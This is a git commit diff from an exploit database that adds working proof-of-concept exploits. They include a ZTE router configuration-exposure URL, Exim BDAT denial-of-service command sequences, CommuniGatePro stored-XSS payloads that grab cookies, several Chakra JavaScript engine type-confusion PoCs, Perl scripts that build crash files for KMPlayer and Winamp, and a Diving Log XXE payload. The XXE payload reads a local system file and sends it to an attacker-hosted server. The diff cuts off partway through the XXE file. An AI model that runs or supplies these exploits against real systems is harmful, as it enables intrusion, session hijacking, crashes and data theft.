DB: 2017-11-28
15 new exploits
This commit is contained in:
parent
c00f565cd2
commit
f52bbcb598
13 changed files with 39546 additions and 38870 deletions
21
exploits/hardware/webapps/43188.txt
Normal file
21
exploits/hardware/webapps/43188.txt
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
# Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access
|
||||||
|
# Date: 27/11/2017
|
||||||
|
# Exploit Author: Ibad Shah
|
||||||
|
# Vendor Homepage: zte.com.cn
|
||||||
|
# Software Link: -
|
||||||
|
# Version: - ZXDSL - 831CII
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# CVE :- 2017-16953
|
||||||
|
|
||||||
|
=======================================
|
||||||
|
The Router usually servers html files & are protected with HTTP Basic
|
||||||
|
Authentication. However, the CGI files does not protect this file from
|
||||||
|
getting exposed to public. A Simple GET request would be needed to
|
||||||
|
made to router that would give a remote attacker an opportunity to
|
||||||
|
modify router PPPoE configurations, setup malicious configurations
|
||||||
|
which later could lead to disrupt network & its activities.
|
||||||
|
|
||||||
|
|
||||||
|
Proof Of Concept
|
||||||
|
================
|
||||||
|
http://192.168.1.1/connoppp.cgi
|
55
exploits/multiple/dos/43184.txt
Normal file
55
exploits/multiple/dos/43184.txt
Normal file
|
@ -0,0 +1,55 @@
|
||||||
|
While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.
|
||||||
|
https://github.com/Exim/exim/blob/master/src/src/receive.c#L1867
|
||||||
|
|
||||||
|
Exim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.
|
||||||
|
https://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547
|
||||||
|
|
||||||
|
Here is a simple PoC which leads to an infinite loop and program crash:
|
||||||
|
|
||||||
|
EHLO localhost
|
||||||
|
MAIL FROM:<test@localhost>
|
||||||
|
RCPT TO:<test@localhost>
|
||||||
|
BDAT 10
|
||||||
|
.
|
||||||
|
BDAT 0
|
||||||
|
|
||||||
|
|
||||||
|
Part of debug info
|
||||||
|
============================
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30502 SMTP>> 250 0 byte chunk received
|
||||||
|
15:36:54 30502 chunking state 0
|
||||||
|
15:36:54 30295 child 30502 ended: status=0x8b
|
||||||
|
15:36:54 30295 signal exit, signal 11 (core dumped)
|
||||||
|
15:36:54 30295 1 SMTP accept process now running
|
||||||
|
15:36:54 30295 Listening...
|
||||||
|
============================
|
||||||
|
|
||||||
|
We also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.
|
||||||
|
This can be triggered using the following command:
|
||||||
|
|
||||||
|
EHLO localhost
|
||||||
|
MAIL FROM:<test@localhost>
|
||||||
|
RCPT TO:<test@localhost>
|
||||||
|
BDAT 100
|
||||||
|
.
|
||||||
|
MAIL FROM:<test@localhost>
|
||||||
|
RCPT TO:<test@localhost>
|
||||||
|
BDAT 0 LAST
|
||||||
|
|
||||||
|
// Tested on current master, ubuntu16.04.
|
157
exploits/multiple/webapps/43177.txt
Normal file
157
exploits/multiple/webapps/43177.txt
Normal file
|
@ -0,0 +1,157 @@
|
||||||
|
# Exploit Title: CommuniGatePro webmails Multiple Stored XSS
|
||||||
|
# Date: 15/11/2017
|
||||||
|
# Exploit Author: Boumediene KADDOUR
|
||||||
|
# Unit: Algerie Telecom R&D Unit
|
||||||
|
# Vendor Homepage: https://www.stalker.com/
|
||||||
|
# Software Link: http://www.stalker.com/ (paid product)
|
||||||
|
# Version: 6.1.16<
|
||||||
|
# Tested on: production server on crystal, pronto and pronto4 webmails from gmail and hotmail.
|
||||||
|
|
||||||
|
CommuniGatePro 6.1.16 webmails (crystal, pronto and pronto4) suffer from multiple stored XSS vulnerabilities. The bellow details illustrate the impact of this vulnerability.
|
||||||
|
|
||||||
|
Vulnerability Description:
|
||||||
|
|
||||||
|
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
|
||||||
|
|
||||||
|
Vulnerability details (Stored XSS):
|
||||||
|
|
||||||
|
This vulnerability allowed us to gain access to the following:
|
||||||
|
|
||||||
|
Control the victim's mailbox by just reading my email
|
||||||
|
|
||||||
|
Control the victim's computer in case the person uses Internet Explorer 8 which is widely used in our company.
|
||||||
|
|
||||||
|
Send emails on behalf the victim
|
||||||
|
|
||||||
|
Deface the whole victim mailbox
|
||||||
|
|
||||||
|
Invoke the malicious piece of code each time an attachment's sent to the victim.
|
||||||
|
|
||||||
|
Vulnerable sections:
|
||||||
|
|
||||||
|
Calendar
|
||||||
|
|
||||||
|
Files
|
||||||
|
|
||||||
|
Tasks
|
||||||
|
|
||||||
|
Notes
|
||||||
|
|
||||||
|
Inbox
|
||||||
|
|
||||||
|
|
||||||
|
Attack Narratives and Scenarios:
|
||||||
|
|
||||||
|
1. Calendar:
|
||||||
|
|
||||||
|
Source webmail: tested with gmail and hotmail
|
||||||
|
|
||||||
|
Destination webmail: Crystal
|
||||||
|
|
||||||
|
In order to deliver our PoC, we have taken the advantages of google calendar to achieve our goal.
|
||||||
|
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
POST /calendar/event HTTP/1.1
|
||||||
|
|
||||||
|
Host: calendar.google.com
|
||||||
|
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||||
|
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
|
||||||
|
Referer: https://calendar.google.com/calendar/render?tab=mc
|
||||||
|
|
||||||
|
X-If-No-Redirect: 1
|
||||||
|
|
||||||
|
X-Is-Xhr-Request: 1
|
||||||
|
|
||||||
|
Content-Type: application/x-www-form-urlencoded;charset=utf-8
|
||||||
|
|
||||||
|
Content-Length: 634
|
||||||
|
|
||||||
|
Cookie: Mycookie
|
||||||
|
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
|
||||||
|
|
||||||
|
|
||||||
|
Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary.
|
||||||
|
|
||||||
|
2. Files:
|
||||||
|
|
||||||
|
Source webmail: pronto/pronto4/Crystal
|
||||||
|
|
||||||
|
Destination webmail: Crystal
|
||||||
|
|
||||||
|
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
|
||||||
|
|
||||||
|
Go to file section.
|
||||||
|
|
||||||
|
Create a directory
|
||||||
|
|
||||||
|
Name the directory with any JavaScript code, in our case (<img src=X onerror=alert(document.cookie)>)
|
||||||
|
|
||||||
|
Share or grant access to victim to be able to at least read the content of the directory
|
||||||
|
|
||||||
|
The victim then recieves the email of granting access to that directory
|
||||||
|
|
||||||
|
The vitim reads the email and then accesses the directory ending up executing the code within its scope of work
|
||||||
|
|
||||||
|
3. Notes:
|
||||||
|
|
||||||
|
Source webmail: Crystal
|
||||||
|
|
||||||
|
Destination webmail: Crystal
|
||||||
|
|
||||||
|
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
|
||||||
|
|
||||||
|
Create a note
|
||||||
|
|
||||||
|
Put the JavaScript code within it
|
||||||
|
|
||||||
|
Share it with the victim
|
||||||
|
|
||||||
|
4. Tasks:
|
||||||
|
|
||||||
|
Source webmail: pronto/pronto4
|
||||||
|
|
||||||
|
Destination webmail: Crystal
|
||||||
|
|
||||||
|
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
|
||||||
|
|
||||||
|
Create a task
|
||||||
|
|
||||||
|
Put the JavaScript code within the task name
|
||||||
|
|
||||||
|
publish it
|
||||||
|
|
||||||
|
5. Inbox
|
||||||
|
|
||||||
|
Source webmail: pronto/pronto4
|
||||||
|
|
||||||
|
Destination webmail: Crystal
|
||||||
|
|
||||||
|
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
|
||||||
|
|
||||||
|
Create an html file with malicious JavaScript piece of code
|
||||||
|
|
||||||
|
Make use of Pronto to send the email to the victim
|
||||||
|
|
||||||
|
The victim reads the email using Crystal webmail and the code gets executed.
|
||||||
|
|
||||||
|
Remediation:
|
||||||
|
|
||||||
|
Sanitize, escape and validate user supplied data accordingly
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
23 Nov, 17 5:36:09 PM: Vendor Notification
|
||||||
|
23 Nov, 17 6:56:33 PM: Vendor Response/Feedback
|
||||||
|
24 Nov, 17 : Vendor released new patched version 6.2.1 and included fixes on version 6.1.19 as a separate Crystal skin package (to be installed as cluster/server-wide custom skin)
|
119
exploits/windows/dos/43180.js
Normal file
119
exploits/windows/dos/43180.js
Normal file
|
@ -0,0 +1,119 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364
|
||||||
|
|
||||||
|
1.
|
||||||
|
In the Chakra's JIT compilation process, it stores variables' type information by basic block.
|
||||||
|
|
||||||
|
function opt(b) {
|
||||||
|
let o;
|
||||||
|
if (b) {
|
||||||
|
// BASIC BLOCK (a)
|
||||||
|
o = {};
|
||||||
|
} else {
|
||||||
|
// BASIC BLOCK (b)
|
||||||
|
o = 1.1;
|
||||||
|
}
|
||||||
|
// BASIC BLOCK (c)
|
||||||
|
return o;
|
||||||
|
}
|
||||||
|
|
||||||
|
For example, let's think the above code gets optimized. At the basic block (a), the type of "o" is always "Object". At the basic block (b), the type of "o" is always "CanBeTaggedValue_Float". At the basic block (c), it combines the two types, and marks the type of "o" as "CanBeTaggedValue_Mixed"(Object + CanBeTaggedValue_Float).
|
||||||
|
|
||||||
|
Explanation of TaggedValue in Chakra: http://abchatra.github.io/TaggedFloat/
|
||||||
|
|
||||||
|
But unlike variables, the type information of constants like numbers, strings is managed globally. This means, once a constant is marked as some type in a certain block. All blocks will treat it as that type regardless of the control flow.
|
||||||
|
|
||||||
|
2.
|
||||||
|
Chakra uses a BailOutOnTaggedValue bailout to ensure a variable's type is "Object". The bailouts can be generated when inlining JavaScript functions.
|
||||||
|
|
||||||
|
function opt(inlinee) {
|
||||||
|
inlinee();
|
||||||
|
}
|
||||||
|
|
||||||
|
Generated IR code for the above code:
|
||||||
|
StatementBoundary #0 #0000
|
||||||
|
s6.var = StartCall 1 (0x1).i32 #0000
|
||||||
|
BailOnNotObject s3[LikelyCanBeTaggedValue_Object].var #0006 Bailout: #0006 (BailOutOnInlineFunction)
|
||||||
|
s10.var = Ld_A [s3[LikelyObject].var+8].u64 #0006
|
||||||
|
BailOnNotEqual [s10.var!].i32, 26 (0x1A).i32 # Bailout: #0006 (BailOutOnInlineFunction)
|
||||||
|
BailOnNotEqual [s3[LikelyObject].var+40].u64, 0xXXXXXXXX (FunctionBody [Anonymous function (#1.3), #4]).u64 # Bailout: #0006 (BailOutOnInlineFunction)
|
||||||
|
|
||||||
|
As you can see after the "BailOnNotObject" opcode which generates "BailOutOnTaggedValue" bailouts, the type of "s3" becomes "LikelyObject" from "LikelyCanBeTaggedValue_Object". This means there's no case where "s3" is not an object after the opcode which ensures its type, so it's safe to use it as an object without checks after the opcode.
|
||||||
|
|
||||||
|
But the problem is that this can be applied to constants.
|
||||||
|
|
||||||
|
Here's the PoC.
|
||||||
|
*/
|
||||||
|
|
||||||
|
function opt2(inlinee, v) {
|
||||||
|
if (v > 0) {
|
||||||
|
inlinee();
|
||||||
|
} else {
|
||||||
|
inlinee.x = 1.1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function opt() {
|
||||||
|
opt2(2.3023e-320, null);
|
||||||
|
}
|
||||||
|
|
||||||
|
function main() {
|
||||||
|
opt2(() => {}, 1); // feed a function to the profiler
|
||||||
|
|
||||||
|
for (let i = 0; i < 10000; i++) {
|
||||||
|
opt();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
main();
|
||||||
|
|
||||||
|
/*
|
||||||
|
We can simply think it as follows:
|
||||||
|
(NOT PRECISE just for understanding)
|
||||||
|
|
||||||
|
Just after inlining:
|
||||||
|
// Basic block (a)
|
||||||
|
s2 = 2.30235E-320; // constant
|
||||||
|
inlinee = s2; // variable
|
||||||
|
if (null > 0) {
|
||||||
|
// Basic block (b)
|
||||||
|
BailOnNotObject(inlinee);
|
||||||
|
inlinee();
|
||||||
|
} else {
|
||||||
|
// Basic block (c)
|
||||||
|
inlinee.x = 1.1;
|
||||||
|
}
|
||||||
|
|
||||||
|
Type map:
|
||||||
|
Constants:
|
||||||
|
s2: CanBeTaggedValue_Float
|
||||||
|
Basic block (a):
|
||||||
|
inlinee: CanBeTaggedValue_Float
|
||||||
|
Basic block (b):
|
||||||
|
inlinee: CanBeTaggedValue_Float
|
||||||
|
Basic block (c):
|
||||||
|
inlinee: CanBeTaggedValue_Float
|
||||||
|
|
||||||
|
In the Global Optimization Phase:
|
||||||
|
// Basic block (a)
|
||||||
|
s2 = 2.30235E-320;
|
||||||
|
if (null > 0) {
|
||||||
|
// Basic block (b)
|
||||||
|
BailOnNotObject(s2);
|
||||||
|
s2();
|
||||||
|
} else {
|
||||||
|
// Basic block (c)
|
||||||
|
s2.x = 1.1;
|
||||||
|
}
|
||||||
|
|
||||||
|
Type map:
|
||||||
|
Constants:
|
||||||
|
s2: CanBeTaggedValue_Float -> Float
|
||||||
|
Basic block (a):
|
||||||
|
Basic block (b):
|
||||||
|
Basic block (c):
|
||||||
|
|
||||||
|
At the basic block (b), the BailOnNotObject opcode changes the type of "s2" to "Float". And since "s2" is a constant, that change affects the basic block (c). So it leads to type confusion at the basic block (c).
|
||||||
|
|
||||||
|
Note: Just "Float" is considered an Object type.
|
||||||
|
*/
|
112
exploits/windows/dos/43181.js
Normal file
112
exploits/windows/dos/43181.js
Normal file
|
@ -0,0 +1,112 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1366
|
||||||
|
|
||||||
|
Here's a snippet of Inline::Optimize.
|
||||||
|
FOREACH_INSTR_EDITING(instr, instrNext, func->m_headInstr)
|
||||||
|
{
|
||||||
|
switch (instr->m_opcode)
|
||||||
|
{
|
||||||
|
case Js::OpCode::Label:
|
||||||
|
{
|
||||||
|
...
|
||||||
|
if (instr->AsLabelInstr()->m_isForInExit)
|
||||||
|
{
|
||||||
|
Assert(this->currentForInDepth != 0); // The PoC hits this
|
||||||
|
this->currentForInDepth--;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case Js::OpCode::InitForInEnumerator:
|
||||||
|
if (!func->IsLoopBody())
|
||||||
|
{
|
||||||
|
this->currentForInDepth++;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case Js::OpCode::CallI:
|
||||||
|
...
|
||||||
|
instrNext = builtInInlineCandidateOpCode != 0 ?
|
||||||
|
this->InlineBuiltInFunction(instr, inlineeData, builtInInlineCandidateOpCode, inlinerData, symThis, &isInlined, profileId, recursiveInlineDepth) :
|
||||||
|
this->InlineScriptFunction(instr, inlineeData, symThis, profileId, &isInlined, recursiveInlineDepth);
|
||||||
|
...
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
"InlineBuiltInFunction" and "InlineScriptFunction" are used to inline a JavaScript function. For example, those methods can convert a call expression as follws.
|
||||||
|
|
||||||
|
Before:
|
||||||
|
s6.var = StartCall 1 (0x1).i32 #0000
|
||||||
|
arg1(s7)<0>.var = ArgOut_A s2.var, s6.var #0003
|
||||||
|
CallI s3.var, arg1(s7)<0>.var #0006
|
||||||
|
|
||||||
|
s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<--- NEXT INSTRUCTION
|
||||||
|
|
||||||
|
After:
|
||||||
|
s6.var = StartCall 1 (0x1).i32 #0000
|
||||||
|
...
|
||||||
|
s12.var = InlineeStart s3.var, iarg1(s7)<24>.var #0006 Func # (#1.3), #4 obj.inlinee
|
||||||
|
s9[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var # Func # (#1.3), #4
|
||||||
|
s8.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #0000 Func # (#1.3), #4
|
||||||
|
StatementBoundary #0 #0002 Func # (#1.3), #4
|
||||||
|
StatementBoundary #-1 #0002 Func # (#1.3), #4
|
||||||
|
InlineeEnd 4 (0x4).i32, s12.var #0000 Func # (#1.3), #4
|
||||||
|
|
||||||
|
StatementBoundary #0 #000c
|
||||||
|
s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<---- NEXT INSTRUCTION
|
||||||
|
|
||||||
|
As you can see the inlinee is wrapped in InlineeStart and InlineeEnd. So to handle the orignal next instructions in the next iterations, those methods must return the call instruction's next instruction. But there's a buggy call flow.
|
||||||
|
|
||||||
|
Here's the call flow.
|
||||||
|
Inline::InlineBuiltInFunction(...) {
|
||||||
|
...
|
||||||
|
if (inlineCallOpCode == Js::OpCode::InlineFunctionCall)
|
||||||
|
{
|
||||||
|
inlineBuiltInEndInstr = InlineCall(callInstr, inlineeData, inlinerData, symCallerThis, pIsInlined, profileId, recursiveInlineDepth);
|
||||||
|
return inlineBuiltInEndInstr->m_next;
|
||||||
|
}
|
||||||
|
...
|
||||||
|
}
|
||||||
|
|
||||||
|
-> InlineCall -> InlineCallTarget ->
|
||||||
|
|
||||||
|
Inline::InlineCallApplyTarget_Shared(...) {
|
||||||
|
IR::Instr* instrNext = callInstr->m_next;
|
||||||
|
return InlineFunctionCommon(callInstr, originalCallTargetOpndIsJITOpt, originalCallTargetStackSym, inlineeData, inlinee, instrNext, returnValueOpnd, callInstr, nullptr, recursiveInlineDepth, safeThis, isApplyTarget);
|
||||||
|
}
|
||||||
|
|
||||||
|
Inline::InlineFunctionCommon(...)
|
||||||
|
{
|
||||||
|
...
|
||||||
|
return instrNext;
|
||||||
|
}
|
||||||
|
|
||||||
|
The point is that it ends up returning "callInstr->m_next->m_next". Therefore, "callInstr->m_next" will be never processed.
|
||||||
|
|
||||||
|
In the PoC, "InitForInEnumerator" will be skipped.
|
||||||
|
|
||||||
|
s16[LikelyUndefined_CanBeTaggedValue].var = CallI s6.var, arg2(s15)<8>.var #0015 << will be inlined
|
||||||
|
InitForInEnumerator s16.var, s17.u64 #001f << Skipped
|
||||||
|
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
*/
|
||||||
|
|
||||||
|
function opt(obj) {
|
||||||
|
for (let i in obj.inlinee.call({})) {
|
||||||
|
}
|
||||||
|
|
||||||
|
for (let i in obj.inlinee.call({})) {
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function main() {
|
||||||
|
let obj = {
|
||||||
|
inlinee: function () {
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
for (let i = 0; i < 10000; i++)
|
||||||
|
opt(obj);
|
||||||
|
}
|
||||||
|
|
||||||
|
main();
|
41
exploits/windows/dos/43182.js
Normal file
41
exploits/windows/dos/43182.js
Normal file
|
@ -0,0 +1,41 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367
|
||||||
|
|
||||||
|
In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code.
|
||||||
|
|
||||||
|
function f(x) {
|
||||||
|
print(x);
|
||||||
|
|
||||||
|
{
|
||||||
|
function x() {
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
print(x);
|
||||||
|
}
|
||||||
|
|
||||||
|
The following code in "PreVisitFunction" is used to decide how to optimize arguments.
|
||||||
|
bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());
|
||||||
|
|
||||||
|
"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.
|
||||||
|
|
||||||
|
function f(x) {
|
||||||
|
x = 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
*/
|
||||||
|
|
||||||
|
function f(x) {
|
||||||
|
arguments;
|
||||||
|
|
||||||
|
{
|
||||||
|
function x() {
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (let i = 0; i < 10000; i++)
|
||||||
|
f();
|
43
exploits/windows/dos/43183.js
Normal file
43
exploits/windows/dos/43183.js
Normal file
|
@ -0,0 +1,43 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1365
|
||||||
|
|
||||||
|
Some background: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364
|
||||||
|
|
||||||
|
There's one more place that emits a BailOnNotObject opcode.
|
||||||
|
|
||||||
|
Here's a snippet of GlobOpt::OptTagChecks.
|
||||||
|
if (valueType.CanBeTaggedValue() &&
|
||||||
|
!valueType.HasBeenNumber() &&
|
||||||
|
(this->IsLoopPrePass() || !this->currentBlock->loop))
|
||||||
|
{
|
||||||
|
ValueType newValueType = valueType.SetCanBeTaggedValue(false);
|
||||||
|
|
||||||
|
// Split out the tag check as a separate instruction.
|
||||||
|
IR::Instr *bailOutInstr;
|
||||||
|
bailOutInstr = IR::BailOutInstr::New(Js::OpCode::BailOnNotObject, IR::BailOutOnTaggedValue, instr, instr->m_func);
|
||||||
|
...
|
||||||
|
}
|
||||||
|
|
||||||
|
The JIT compiler analyzes a loop twice for some reasons such as to track types properly. In the first analysis, "IsLoopPrePass" returns true. And it returns false in the second analysis.
|
||||||
|
|
||||||
|
But in the above snippet, it emits the bailout opcode in the first analysis("this->IsLoopPrePass()" is satisfied). But the return value of "valueType.HasBeenNumber()" can be different in the second analysis. So it may fail to detect type changes.
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
*/
|
||||||
|
|
||||||
|
function opt() {
|
||||||
|
let obj = [2.3023e-320];
|
||||||
|
for (let i = 0; i < 1; i++) {
|
||||||
|
obj.x = 1; // In the first analysis, BailOnNotObject emitted
|
||||||
|
obj = +obj; // Change the type
|
||||||
|
obj.x = 1; // Type confusion
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function main() {
|
||||||
|
for (let i = 0; i < 1000; i++) {
|
||||||
|
opt();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
main();
|
20
exploits/windows/dos/43185.pl
Executable file
20
exploits/windows/dos/43185.pl
Executable file
|
@ -0,0 +1,20 @@
|
||||||
|
#! /usr/bin/perl
|
||||||
|
# Exploit Title: KMPlayer .nsv Denial of Service
|
||||||
|
# Date: 2017-11-22
|
||||||
|
# Exploit Author: R.Yavari
|
||||||
|
# Version: v4.2.2.4
|
||||||
|
# Tested on: Windows 10 , Windows 7
|
||||||
|
# other version should be affected
|
||||||
|
# NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet,
|
||||||
|
# such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data.
|
||||||
|
# CVE-2017-16952
|
||||||
|
# http://cdn.kmplayer.com/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe
|
||||||
|
# (D.P)
|
||||||
|
|
||||||
|
open(code, ">kmplayer.nsv") || die "can't create crash sample.$!";
|
||||||
|
binmode(code);
|
||||||
|
$data =
|
||||||
|
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45";
|
||||||
|
print code $data;
|
||||||
|
|
||||||
|
close(code);
|
22
exploits/windows/dos/43186.pl
Executable file
22
exploits/windows/dos/43186.pl
Executable file
|
@ -0,0 +1,22 @@
|
||||||
|
#! /usr/bin/perl
|
||||||
|
# Exploit Title: Winamp Pro (.wav|.wmv|.au|.asf|.aiff|.aif ) Denial of Service
|
||||||
|
# Date: 2017-11-22
|
||||||
|
# Exploit Author: R.Yavari
|
||||||
|
# Version: v5.66.Build.3512
|
||||||
|
# Tested on: Windows 10 , Windows 7
|
||||||
|
# other version should be affected
|
||||||
|
# CVE-2017-16951
|
||||||
|
# http://meggamusic.co.uk/winamp/winamp5666_full_en-us_redux.exe
|
||||||
|
# (D.P)
|
||||||
|
open(code, ">winamp.wav") || die "can't create crash sample.$!";
|
||||||
|
binmode(code);
|
||||||
|
$data =
|
||||||
|
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" .
|
||||||
|
"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" .
|
||||||
|
"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" .
|
||||||
|
"\x13\x00\x13\x00\x12\x00\x14\x00\x14\x00";
|
||||||
|
|
||||||
|
|
||||||
|
print code $data;
|
||||||
|
|
||||||
|
close(code);
|
75
exploits/windows/local/43187.txt
Normal file
75
exploits/windows/local/43187.txt
Normal file
|
@ -0,0 +1,75 @@
|
||||||
|
[+] Exploit Title: Diving Log 6.0 XXE Injection
|
||||||
|
[+] Date: 27-11-2017
|
||||||
|
[+] Exploit Author: Trent Gordon
|
||||||
|
[+] Vendor Homepage: http://www.divinglog.de
|
||||||
|
[+] Software Link: http://www.divinglog.de/english/download/
|
||||||
|
[+] Disclosed at: https://thenopsled.com/divinglog.txt
|
||||||
|
[+] Version: 6.0
|
||||||
|
[+] Tested on: Windows 7 SP1, Windows 10
|
||||||
|
[+] CVE: CVE-2017-9095
|
||||||
|
|
||||||
|
==================
|
||||||
|
Background:
|
||||||
|
==================
|
||||||
|
Diving Log 6.0 is a scuba diving log software that manages and consolidates logs from other disparate sources. Many scuba diving log software programs export their data in an XML file.
|
||||||
|
|
||||||
|
==================
|
||||||
|
Vulnerability:
|
||||||
|
==================
|
||||||
|
By having a user import a crafted dive.xml file (very common, many divers share logs), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
|
||||||
|
1.)Open Diving Log 6.0
|
||||||
|
2.)Close "Welcome Center" popup and select "Import" from the bottom left corner
|
||||||
|
3.)Select "Subsurface" from the list of import data types.
|
||||||
|
4.)"Open File" and select the crafted dive.xml file (with listener open on ATTACKERS-IP)
|
||||||
|
|
||||||
|
==================
|
||||||
|
Proof of Concept:
|
||||||
|
==================
|
||||||
|
|
||||||
|
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)
|
||||||
|
|
||||||
|
b.) Hosted "payload.dtd"
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="utf-8" ?>
|
||||||
|
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
|
||||||
|
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
|
||||||
|
|
||||||
|
|
||||||
|
c.) Exploited "dive.xml"
|
||||||
|
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE data [
|
||||||
|
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP/payload.dtd">
|
||||||
|
%sp;
|
||||||
|
%param1;
|
||||||
|
%exfil;
|
||||||
|
]>
|
||||||
|
<divelog program='subsurface' version='3'>
|
||||||
|
<settings>
|
||||||
|
</settings>
|
||||||
|
<divesites>
|
||||||
|
<site uuid='33a32a07' name='hacked'>
|
||||||
|
</site>
|
||||||
|
</divesites>
|
||||||
|
<dives>
|
||||||
|
<dive number='1' divesiteid='33a32a07' date='2017-05-15' time='14:49:10' duration='46:00 min'>
|
||||||
|
<notes></notes>
|
||||||
|
<cylinder size='11.1 l' workpressure='207.0 bar' description='unknown' />
|
||||||
|
